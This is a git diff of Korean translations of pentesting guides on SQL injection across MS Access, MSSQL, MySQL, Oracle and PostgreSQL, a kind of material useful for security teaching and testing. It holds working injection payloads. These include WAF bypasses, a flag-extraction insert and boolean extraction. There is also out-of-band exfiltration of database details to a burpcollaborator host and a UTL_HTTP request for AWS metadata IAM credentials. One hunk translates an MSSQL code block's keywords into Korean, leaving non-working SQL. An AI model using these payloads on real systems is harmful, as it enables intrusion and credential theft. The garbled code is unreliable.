 username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
@@ -387,7 +387,7 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
 ```
 ## WAF 우회
 
-[여기에서 초기 우회 확인](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)
+[초기 우회는 여기에서](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)
 
 ### 공백 없는 우회
 
@@ -443,9 +443,9 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
 ```
 ### 열 이름 제한 우회
 
-우선, **원래 쿼리와 플래그를 추출하려는 테이블의 열 수가 동일하다면** 다음과 같이 할 수 있습니다: `0 UNION SELECT * FROM flag`
+먼저, **원래 쿼리와 플래그를 추출하려는 테이블의 열 수가 동일하다면** 다음과 같이 할 수 있습니다: `0 UNION SELECT * FROM flag`
 
-**이름을 사용하지 않고 테이블의 세 번째 열에 접근하는 것이 가능합니다**. 다음과 같은 쿼리를 사용하여: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, 따라서 sqlinjection에서는 다음과 같이 보일 것입니다:
+**열 이름을 사용하지 않고 테이블의 세 번째 열에 접근하는 것이 가능합니다**. 다음과 같은 쿼리를 사용하여: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, 따라서 sqlinjection에서는 다음과 같이 보일 것입니다:
 ```bash
 # This is an example with 3 columns that will extract the column number 3
 -1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index f43266d35..956fda48e 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -31,7 +31,7 @@ MS Access에는 댓글이 없지만, NULL 문자로 쿼리의 마지막을 제
 
 ### LIMIT
 
-**`LIMIT`** 연산자는 **구현되지 않았습니다**. 그러나 **`TOP` 연산자**를 사용하여 SELECT 쿼리 결과를 **첫 N 테이블 행으로 제한**하는 것이 가능합니다. `TOP`은 반환할 행의 수를 나타내는 정수를 인수로 받습니다.
+**`LIMIT`** 연산자는 **구현되지 않았습니다**. 그러나 **`TOP` 연산자를 사용하여 SELECT 쿼리 결과를 처음 N 테이블 행으로 제한하는** 것이 가능합니다. `TOP`은 반환할 행의 수를 나타내는 정수를 인수로 받습니다.
 ```sql
 1' UNION SELECT TOP 3 attr FROM table%00
 ```
@@ -52,7 +52,7 @@ Therefore, you need to know a **valid table name**.
 
 **MS Access**는 **`'1'=2='3'='asd'=false`**와 같은 **이상한 구문**을 허용합니다. 일반적으로 SQL 인젝션은 **`WHERE`** 절 안에 있으므로 이를 악용할 수 있습니다.
 
-MS Access 데이터베이스에 SQLi가 있고, 한 **열 이름이 username**이라는 것을 알고 (또는 추측하고) 그 필드를 **추출**하고 싶다고 가정해 보십시오. 체인 등호 기법을 사용할 때 웹 앱의 다양한 응답을 확인하고 **`Mid`** 함수를 사용하여 부분 문자열을 얻는 **부울 인젝션**으로 콘텐츠를 추출할 수 있습니다.
+MS Access 데이터베이스에 SQLi가 있고 (알거나 추측한) 한 **열 이름이 username**이라는 것을 알고 있으며, 그 필드를 **추출**하고 싶다고 가정해 보십시오. 체인 등호 기법을 사용할 때 웹 앱의 다양한 응답을 확인하고 **`Mid`** 함수를 사용하여 부분 문자열을 얻는 **부울 인젝션**으로 콘텐츠를 추출할 수 있습니다.
 ```sql
 '=(Mid(username,1,3)='adm')='
 ```
@@ -64,7 +64,7 @@ _온라인 플레이그라운드에서 확인해 보세요._
 
 ### 테이블 이름 강제 추측
 
-체인 이퀄스 기법을 사용하여 **테이블 이름을 강제로 추측**할 수 있습니다:
+체인 이퀄스 기법을 사용하여 **테이블 이름을 강제 추측**할 수 있습니다:
 ```sql
 '=(select+top+1+'lala'+from+<table_name>)='
 ```
@@ -75,11 +75,11 @@ _온라인 플레이그라운드에서 확인해 보세요._
 _온라인 플레이그라운드에서 확인해 보세요._
 
 - Sqlmap 일반 테이블 이름: [https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt](https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt)
-- [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) 에도 다른 목록이 있습니다.
+- [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) 에 또 다른 목록이 있습니다.
 
 ### 열 이름 강제 추측
 
-체인 등호 트릭을 사용하여 **현재 열 이름을 강제로 추측할 수 있습니다**:
+현재 열 이름을 **강제 추측**할 수 있습니다. chaining equals trick을 사용하여:
 ```sql
 '=column_name='
 ```
@@ -95,7 +95,7 @@ _온라인 플레이그라운드에서 확인해 보세요._
 ```
 ### 데이터 덤프
 
-우리는 이미 [**체인 이퀄스 기법**](ms-access-sql-injection.md#chaining-equals-+-substring) **을 사용하여 현재 및 다른 테이블에서 데이터를 덤프하는 방법**에 대해 논의했습니다. 하지만 다른 방법도 있습니다:
+우리는 이미 [**체인 등호 기법**](ms-access-sql-injection.md#chaining-equals-+-substring) **을 사용하여 현재 및 다른 테이블에서 데이터를 덤프하는 방법**에 대해 논의했습니다. 하지만 다른 방법도 있습니다:
 ```sql
 IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
 ```
@@ -116,7 +116,7 @@ Check [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=
 
 ## 테이블 열거하기
 
-From [**here**](https://dataedo.com/kb/query/access/list-of-tables-in-the-database) you can see a query to get tables names:
+[**여기**](https://dataedo.com/kb/query/access/list-of-tables-in-the-database)에서 테이블 이름을 가져오는 쿼리를 볼 수 있습니다:
 ```sql
 select MSysObjects.name
 from MSysObjects
@@ -154,13 +154,13 @@ MS Access는 **웹 디렉토리 전체 경로를 포함하는 오류 메시지**
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
 
-여기서 **name\[i]는 .mdb 파일 이름**이고 **realTable은 데이터베이스 내의 존재하는 테이블**입니다. MS Access는 항상 오류 메시지를 트리거하지만, 유효하지 않은 파일 이름과 유효한 .mdb 파일 이름을 구별할 수 있습니다.
+여기서 **name\[i]는 .mdb 파일 이름**이고 **realTable은 데이터베이스 내의 존재하는 테이블**입니다. MS Access는 항상 오류 메시지를 트리거하지만, 유효하지 않은 파일 이름과 유효한 .mdb 파일 이름을 구별하는 것은 가능합니다.
 
 ### .mdb 비밀번호 크래커
 
 [**Access PassView**](https://www.nirsoft.net/utils/accesspv.html)는 Microsoft Access 95/97/2000/XP 또는 Jet Database Engine 3.0/4.0의 주요 데이터베이스 비밀번호를 복구하는 데 사용할 수 있는 무료 유틸리티입니다.
 
-## 참고 문헌
+## 참조
 
 - [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
 
diff --git a/src/pentesting-web/sql-injection/mssql-injection.md b/src/pentesting-web/sql-injection/mssql-injection.md
index bfbede0cb..9da37f6c9 100644
--- a/src/pentesting-web/sql-injection/mssql-injection.md
+++ b/src/pentesting-web/sql-injection/mssql-injection.md
@@ -4,12 +4,12 @@
 
 ## Active Directory enumeration
 
-다음 MSSQL 함수를 사용하여 **MSSQL 서버 내에서 SQL 인젝션을 통해 도메인 사용자를 열거할 수 있습니다**:
+다음 MSSQL 함수를 사용하여 **MSSQL** 서버 내에서 SQL 인젝션을 통해 도메인 사용자를 **열거**할 수 있습니다:
 
 - **`SELECT DEFAULT_DOMAIN()`**: 현재 도메인 이름을 가져옵니다.
-- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: 도메인 이름(_DOMAIN_ 이 예제에서)을 알고 있다면 이 함수는 **관리자 사용자**의 **SID를 16진수 형식**으로 반환합니다. 이는 `0x01050000000[...]0000f401`처럼 보일 것이며, **마지막 4바이트**가 **빅 엔디안** 형식으로 **500**이라는 숫자라는 점에 유의하세요. 이는 **관리자 사용자**의 **공통 ID**입니다.\
-이 함수는 **도메인의 ID를 알 수 있게 해줍니다** (마지막 4바이트를 제외한 모든 바이트).
-- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : 이 함수는 **지정된 ID의 사용자 이름을 반환합니다** (있는 경우), 이 경우 **0000e803**는 빅 엔디안 == **1000**입니다 (일반적으로 이는 생성된 첫 번째 일반 사용자 ID의 ID입니다). 그러면 1000에서 2000까지 사용자 ID를 무차별 대입하여 도메인 사용자의 모든 사용자 이름을 얻을 수 있다고 상상할 수 있습니다. 예를 들어 다음과 같은 함수를 사용하여:
+- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: 도메인 이름(_DOMAIN_ 이 예제에서) 을 알고 있다면 이 함수는 **관리자 사용자**의 **SID**를 16진수 형식으로 반환합니다. 이는 `0x01050000000[...]0000f401`처럼 보일 것이며, **마지막 4바이트**가 **500**이라는 숫자를 **빅 엔디안** 형식으로 나타내며, 이는 **관리자 사용자**의 **공통 ID**입니다.\
+이 함수는 **도메인의 ID**를 알 수 있게 해줍니다 (마지막 4바이트를 제외한 모든 바이트).
+- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : 이 함수는 **지정된 ID의 사용자 이름**을 반환합니다 (있다면), 이 경우 **0000e803**는 빅 엔디안 == **1000**입니다 (보통 이는 생성된 첫 번째 일반 사용자 ID의 ID입니다). 그러면 1000에서 2000까지 사용자 ID를 무차별 대입하여 도메인 사용자의 모든 사용자 이름을 얻을 수 있다고 상상할 수 있습니다. 예를 들어 다음과 같은 함수를 사용하여:
 ```python
 def get_sid(n):
 domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
@@ -85,9 +85,9 @@ EXEC sp_helprotect 'fn_trace_gettabe';
 ```
 ### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
 
-`xp_dirtree`와 같은 저장 프로시저는 Microsoft에 의해 공식적으로 문서화되지는 않았지만, MSSQL 내에서 네트워크 작업에 유용하기 때문에 온라인에서 다른 사람들에 의해 설명되었습니다. 이러한 프로시저는 다양한 [예제](https://www.notsosecure.com/oob-exploitation-cheatsheet/)와 [게시물](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/)에서 보여준 바와 같이 Out of Band 데이터 유출에 자주 사용됩니다.
+`xp_dirtree`와 같은 저장 프로시저는 Microsoft에 의해 공식적으로 문서화되지는 않았지만, MSSQL 내에서 네트워크 작업에 유용하기 때문에 온라인에서 다른 사람들에 의해 설명되었습니다. 이러한 프로시저는 다양한 [예제](https://www.notsosecure.com/oob-exploitation-cheatsheet/)와 [게시물](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/)에서 보여준 바와 같이 Out of Band Data exfiltration에 자주 사용됩니다.
 
-예를 들어, `xp_dirtree` 저장 프로시저는 네트워크 요청을 수행하는 데 사용되지만, TCP 포트 445로만 제한됩니다. 포트 번호는 수정할 수 없지만, 네트워크 공유에서 읽는 것을 허용합니다. 사용법은 아래 SQL 스크립트에서 보여집니다:
+예를 들어, `xp_dirtree` 저장 프로시저는 네트워크 요청을 만드는 데 사용되지만, TCP 포트 445로만 제한됩니다. 포트 번호는 수정할 수 없지만, 네트워크 공유에서 읽는 것을 허용합니다. 사용법은 아래 SQL 스크립트에서 보여집니다:
 ```sql
 DECLARE @user varchar(100);
 SELECT @user = (SELECT user);
@@ -209,11 +209,11 @@ SELECT 'a' SELECT 'b'
 So for example, multiple queries such as:
 
 ```sql
-use [tempdb]  
-create table [test] ([id] int)  
-insert [test] values(1)  
-select [id] from [test]  
-drop table[test]
+사용 [tempdb]  
+테이블 [test] 생성 ([id] int)  
+[테스트]에 값 삽입(1)  
+[테스트]에서 [id] 선택  
+테이블 [test] 삭제
 ```
 
 Can be reduced to:
diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md
index 524f9093b..e8df8ef07 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/README.md
@@ -50,14 +50,14 @@ SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCH
 ```
 ## 흐름
 
-"모던" 버전의 **MySQL**에서는 "_**information_schema.tables**_"를 "_**mysql.innodb_table_stats**_**"로 대체할 수 있다는 점을 기억하세요. (이는 WAF를 우회하는 데 유용할 수 있습니다.)
+"모던" 버전의 **MySQL**에서는 "_**information_schema.tables**_"를 "_**mysql.innodb_table_stats**_**"**로 대체할 수 있다는 점을 기억하세요 (이는 WAF를 우회하는 데 유용할 수 있습니다).
 ```sql
 SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
 SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
 SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
 SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 ```
-### **오직 1 값**
+### **오직 1개의 값**
 
 - `group_concat()`
 - `Limit X,1`
@@ -99,13 +99,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 ## SSRF
 
-**여기에서** [**Mysql injection을 악용하여 SSRF를 얻는 다양한 옵션을 배우세요**](mysql-ssrf.md)**.**
+**여기에서 Mysql injection을 악용하여 SSRF를 얻는 다양한 옵션을 배워보세요** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
 
 ## WAF 우회 기법
 
-### 준비된 문장을 통한 쿼리 실행
+### Prepared Statements를 통한 쿼리 실행
 
-스택 쿼리가 허용될 때, 실행하려는 쿼리의 16진수 표현을 변수에 할당하고 (SET을 사용하여) PREPARE 및 EXECUTE MySQL 문을 사용하여 궁극적으로 쿼리를 실행함으로써 WAF를 우회할 수 있을 가능성이 있습니다. 다음과 같은 방식입니다:
+스택 쿼리가 허용되는 경우, 실행하려는 쿼리의 16진수 표현을 변수에 할당하고 (SET을 사용하여) PREPARE 및 EXECUTE MySQL 문을 사용하여 궁극적으로 쿼리를 실행함으로써 WAF를 우회할 수 있을 수 있습니다. 다음과 같은 방식입니다:
 ```
 0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
 ```
@@ -121,7 +121,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
 ```
-### 열 이름 없이 값 가져오기
+### 열 이름 없이 값 검색하기
 
 어떤 시점에 테이블의 이름은 알지만 테이블 안의 열 이름은 모를 경우, 다음과 같은 명령을 실행하여 열의 개수를 찾으려고 시도할 수 있습니다:
 ```bash
@@ -129,7 +129,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 select (select "", "") = (SELECT * from demo limit 1);     # 2columns
 select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
 ```
-두 개의 열이 있다고 가정할 때 (첫 번째 열은 ID이고 두 번째 열은 플래그입니다), 문자 하나씩 시도하여 플래그의 내용을 무차별 대입으로 시도할 수 있습니다:
+두 개의 열이 있다고 가정할 때 (첫 번째 열은 ID이고 두 번째 열은 플래그임), 플래그의 내용을 문자별로 시도하여 브루트포스 공격을 시도할 수 있습니다:
 ```bash
 # When True, you found the correct char and can start ruteforcing the next position
 select (select 1, 'flaf') = (SELECT * from demo limit 1);
diff --git a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
index 4a68907e0..6057ccc5f 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -16,14 +16,14 @@ SQL Out of Band 데이터 유출 탐색에서 `LOAD_FILE()` 함수는 네트워
 
 ### 사용자 정의 함수(UDF)를 통한 원격 코드 실행(RCE)
 
-MySQL 데이터베이스는 외부 라이브러리 파일에서 사용자 정의 함수(UDF)를 사용할 수 있습니다. 이러한 라이브러리가 특정 디렉토리 내에서 또는 시스템의 `$PATH`에 접근 가능하다면 MySQL 내에서 호출할 수 있습니다.
+MySQL 데이터베이스는 외부 라이브러리 파일에서 사용자 정의 함수(UDF)를 사용할 수 있습니다. 이러한 라이브러리가 특정 디렉토리 내에 있거나 시스템의 `$PATH`에 접근 가능하다면 MySQL 내에서 호출할 수 있습니다.
 
 이 기술은 여러 조건이 충족되는 경우 UDF를 통해 네트워크/HTTP 요청을 실행할 수 있게 해줍니다. 여기에는 `@@plugin_dir`에 대한 쓰기 접근, `file_priv`가 `Y`로 설정, `secure_file_priv`가 비활성화되어야 합니다.
 
 예를 들어, `lib_mysqludf_sys` 라이브러리 또는 HTTP 요청을 가능하게 하는 다른 UDF 라이브러리를 로드하여 SSRF를 수행할 수 있습니다. 라이브러리는 서버로 전송되어야 하며, 이는 라이브러리의 내용을 hex 또는 base64로 인코딩한 후 적절한 디렉토리에 작성하여 달성할 수 있습니다.
 
-`@@plugin_dir`가 쓰기 불가능한 경우, 특히 MySQL 버전이 `v5.0.67` 이상인 경우 프로세스가 달라집니다. 이러한 경우에는 쓰기 가능한 대체 경로를 사용해야 합니다.
+`@@plugin_dir`가 쓰기 불가능한 경우 프로세스는 달라지며, 특히 MySQL 버전이 `v5.0.67` 이상인 경우 대체 경로를 사용해야 합니다.
 
-이러한 프로세스의 자동화는 UDF 주입을 지원하는 SQLMap과 같은 도구를 통해 용이해질 수 있으며, 블라인드 SQL 주입의 경우 출력 리디렉션 또는 DNS 요청 밀반입 기술을 활용할 수 있습니다.
+이러한 프로세스의 자동화는 UDF 주입을 지원하는 SQLMap과 같은 도구를 통해 촉진될 수 있으며, 블라인드 SQL 주입의 경우 출력 리디렉션 또는 DNS 요청 밀반입 기술을 활용할 수 있습니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md
index 81ea691da..8ba6dce5e 100644
--- a/src/pentesting-web/sql-injection/oracle-injection.md
+++ b/src/pentesting-web/sql-injection/oracle-injection.md
@@ -6,11 +6,11 @@
 
 ## SSRF
 
-Oracle을 사용하여 Out of Band HTTP 및 DNS 요청을 수행하는 것은 잘 문서화되어 있지만, SQL 데이터 유출 수단으로서의 주입에서 사용됩니다. 우리는 항상 이러한 기술/기능을 수정하여 다른 SSRF/XSPA를 수행할 수 있습니다.
+Oracle을 사용하여 Out of Band HTTP 및 DNS 요청을 수행하는 것은 잘 문서화되어 있지만, SQL 데이터 유출을 위한 주입 수단으로도 사용됩니다. 우리는 항상 이러한 기술/함수를 수정하여 다른 SSRF/XSPA를 수행할 수 있습니다.
 
-Oracle 설치는 정말 고통스러울 수 있으며, 특히 명령을 시도하기 위해 빠른 인스턴스를 설정하려는 경우에는 더욱 그렇습니다. [Appsecco](https://appsecco.com)의 친구이자 동료인 [Abhisek Datta](https://github.com/abhisek)가 t2.large AWS Ubuntu 머신과 Docker에서 인스턴스를 설정할 수 있게 해주는 [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c)를 알려주었습니다.
+Oracle 설치는 정말 고통스러울 수 있으며, 특히 명령을 시도하기 위해 빠른 인스턴스를 설정하려는 경우에는 더욱 그렇습니다. [Appsecco](https://appsecco.com)의 친구이자 동료인 [Abhisek Datta](https://github.com/abhisek)가 저에게 [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c)를 알려주었고, 이를 통해 t2.large AWS Ubuntu 머신과 Docker에서 인스턴스를 설정할 수 있었습니다.
 
-이 블로그 게시물의 과정에서 Oracle을 네이티브 설치로 전체 네트워크 액세스를 가진 것처럼 모방할 수 있도록 `--network="host"` 플래그와 함께 docker 명령을 실행했습니다.
+저는 이 블로그 게시물의 과정에서 Oracle을 네이티브 설치로 전체 네트워크 액세스를 가진 것처럼 모방할 수 있도록 `--network="host"` 플래그와 함께 docker 명령을 실행했습니다.
 ```
 docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
 ```
@@ -37,15 +37,15 @@ site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portn
 - DBMS_STREAMS_ADM
 - UTL_HTTP
 
-이 간단한 검색은 `DBMS_LDAP`와 같은 패키지를 명백히 건너뛰며 (호스트 이름과 포트 번호를 전달할 수 있음) [문서 페이지](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)는 단순히 [다른 위치](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)로 안내합니다. 따라서 제가 놓쳤을 수 있는 외부 요청을 수행하는 데 악용될 수 있는 다른 Oracle 패키지가 있을 수 있습니다.
+이 간단한 검색은 `DBMS_LDAP`와 같은 패키지를 명백히 건너뛰는데, 이는 호스트 이름과 포트 번호를 전달할 수 있게 해줍니다. [문서 페이지](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)는 단순히 [다른 위치](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)로 안내합니다. 따라서 제가 놓쳤을 수 있는 외부 요청을 수행할 수 있는 다른 Oracle 패키지가 있을 수 있습니다.
 
 어쨌든, 우리가 발견하고 위에 나열한 패키지 중 일부를 살펴보겠습니다.
 
 **DBMS_LDAP.INIT**
 
-`DBMS_LDAP` 패키지는 LDAP 서버에서 데이터에 접근할 수 있도록 합니다. `init()` 함수는 LDAP 서버와의 세션을 초기화하며 호스트 이름과 포트 번호를 인수로 받습니다.
+`DBMS_LDAP` 패키지는 LDAP 서버에서 데이터에 접근할 수 있게 해줍니다. `init()` 함수는 LDAP 서버와의 세션을 초기화하며, 호스트 이름과 포트 번호를 인수로 받습니다.
 
-이 함수는 DNS를 통해 데이터 유출을 보여주는 문서화된 바가 있습니다, 아래와 같이
+이 함수는 DNS를 통해 데이터 유출을 보여주는 문서화된 예가 있습니다, 아래와 같이.
 ```
 SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
 ```
@@ -62,9 +62,9 @@ SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
 
 **UTL_SMTP**
 
-`UTL_SMTP` 패키지는 SMTP를 통해 이메일을 보내기 위해 설계되었습니다. [Oracle 문서 사이트에 제공된 예제는 이 패키지를 사용하여 이메일을 보내는 방법을 보여줍니다](https://docs.oracle.com/database/121/ARPLS/u_smtp.htm#ARPLS71478). 그러나 우리에게 흥미로운 점은 호스트 및 포트 사양을 제공할 수 있는 능력입니다.
+`UTL_SMTP` 패키지는 SMTP를 통해 이메일을 전송하기 위해 설계되었습니다. [Oracle 문서 사이트에 제공된 예제는 이 패키지를 사용하여 이메일을 전송하는 방법을 보여줍니다](https://docs.oracle.com/database/121/ARPLS/u_smtp.htm#ARPLS71478). 그러나 우리에게 흥미로운 점은 호스트 및 포트 사양을 제공할 수 있는 능력입니다.
 
-아래는 2초의 타임아웃을 가진 `UTL_SMTP.OPEN_CONNECTION` 함수의 조잡한 예입니다.
+아래에는 2초의 타임아웃을 가진 `UTL_SMTP.OPEN_CONNECTION` 함수의 간단한 예가 나와 있습니다.
 ```
 DECLARE c utl_smtp.connection;
 BEGIN
@@ -84,7 +84,7 @@ END;
 
 `UTL_TCP` 패키지와 그 절차 및 함수는 [서비스와의 TCP/IP 기반 통신을 허용합니다](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). 특정 서비스에 대해 프로그래밍된 경우, 이 패키지는 네트워크로의 접근 방법이 되거나 모든 TCP/IP 연결의 모든 측면을 제어할 수 있으므로 전체 서버 측 요청을 수행할 수 있습니다.
 
-예제는 [Oracle 문서 사이트에서 이 패키지를 사용하여 웹 페이지를 가져오기 위해 원시 TCP 연결을 만드는 방법을 보여줍니다](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). 우리는 이를 조금 더 단순화하여 메타데이터 인스턴스나 임의의 TCP/IP 서비스에 요청을 만드는 데 사용할 수 있습니다.
+예제는 [Oracle 문서 사이트에서 이 패키지를 사용하여 웹 페이지를 가져오기 위해 원시 TCP 연결을 만드는 방법을 보여줍니다](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). 우리는 이를 조금 더 간단하게 만들어 메타데이터 인스턴스나 임의의 TCP/IP 서비스에 요청을 하는 데 사용할 수 있습니다.
 ```
 set serveroutput on size 30000;
 SET SERVEROUTPUT ON
@@ -128,7 +128,7 @@ END;
 
 **UTL_HTTP 및 웹 요청**
 
-아마도 모든 Out of Band Oracle SQL Injection 튜토리얼에서 가장 일반적이고 널리 문서화된 기술은 [`UTL_HTTP` 패키지](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070)입니다. 이 패키지는 문서에서 다음과 같이 정의됩니다 - `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`
+아마도 모든 Out of Band Oracle SQL Injection 튜토리얼에서 가장 일반적이고 널리 문서화된 기술은 [`UTL_HTTP` 패키지](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070)입니다. 이 패키지는 문서에서 다음과 같이 정의됩니다 - `UTL_HTTP 패키지는 SQL 및 PL/SQL에서 하이퍼텍스트 전송 프로토콜(HTTP) 호출을 수행합니다. 이를 사용하여 HTTP를 통해 인터넷의 데이터에 접근할 수 있습니다.`
 ```
 select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
 ```
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md
index 52263254b..1509b6912 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -46,7 +46,7 @@ SELECT query_to_xml('select * from pg_user',true,true,'');
 ```
 **database_to_xml**
 
-이 함수는 전체 데이터베이스를 XML 형식으로 단 1행에 덤프합니다(데이터베이스가 매우 클 경우 DoS 공격을 하거나 심지어 자신의 클라이언트에 영향을 줄 수 있으니 주의하세요):
+이 함수는 전체 데이터베이스를 XML 형식으로 단 1행에 덤프합니다(데이터베이스가 매우 큰 경우 DoS를 발생시키거나 심지어 자신의 클라이언트를 손상시킬 수 있으니 주의하세요):
 ```sql
 SELECT database_to_xml(true,true,'');
 ```
@@ -64,7 +64,7 @@ select encode('select cast(string_agg(table_name, '','') as int) from informatio
 ```
 ### 금지된 인용구
 
-페이로드에 인용구를 사용할 수 없는 경우, 기본 절에 대해 `CHR`를 사용하여 우회할 수 있습니다 (_문자 연결은 SELECT, INSERT, DELETE 등과 같은 기본 쿼리에만 작동합니다. 모든 SQL 문에 대해 작동하지 않습니다_):
+페이로드에 인용구를 사용할 수 없는 경우, 기본 절을 위해 `CHR`를 사용하여 우회할 수 있습니다 (_문자 연결은 SELECT, INSERT, DELETE 등과 같은 기본 쿼리에만 작동합니다. 모든 SQL 문에 대해 작동하지 않습니다_):
 ```
 SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
 ```
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index ec93e13d9..2f254a672 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -2,9 +2,9 @@
 
 ### PostgreSQL 대용량 객체
 
-PostgreSQL는 **대용량 객체**로 알려진 구조를 제공하며, 이는 `pg_largeobject` 테이블을 통해 접근할 수 있으며, 이미지나 PDF 문서와 같은 대형 데이터 유형을 저장하기 위해 설계되었습니다. 이 접근 방식은 **데이터를 파일 시스템으로 다시 내보내는** 기능을 제공하므로, 원본 파일의 정확한 복제본이 유지됩니다.
+PostgreSQL는 **대용량 객체**로 알려진 구조를 제공하며, 이는 `pg_largeobject` 테이블을 통해 접근할 수 있으며, 이미지나 PDF 문서와 같은 대형 데이터 유형을 저장하기 위해 설계되었습니다. 이 접근 방식은 **데이터를 파일 시스템으로 다시 내보내는** 기능을 제공하므로 `COPY TO` 함수보다 유리하며, 원본 파일의 정확한 복제본이 유지됩니다.
 
-이 테이블 내에서 **전체 파일을 저장하기 위해**, `pg_largeobject` 테이블에 객체를 생성해야 하며(LOID로 식별됨), 그 다음에 각 2KB 크기의 데이터 청크를 이 객체에 삽입해야 합니다. 이러한 청크는 내보내기 기능이 올바르게 작동하도록 보장하기 위해 정확히 2KB 크기여야 합니다(마지막 청크는 예외일 수 있음).
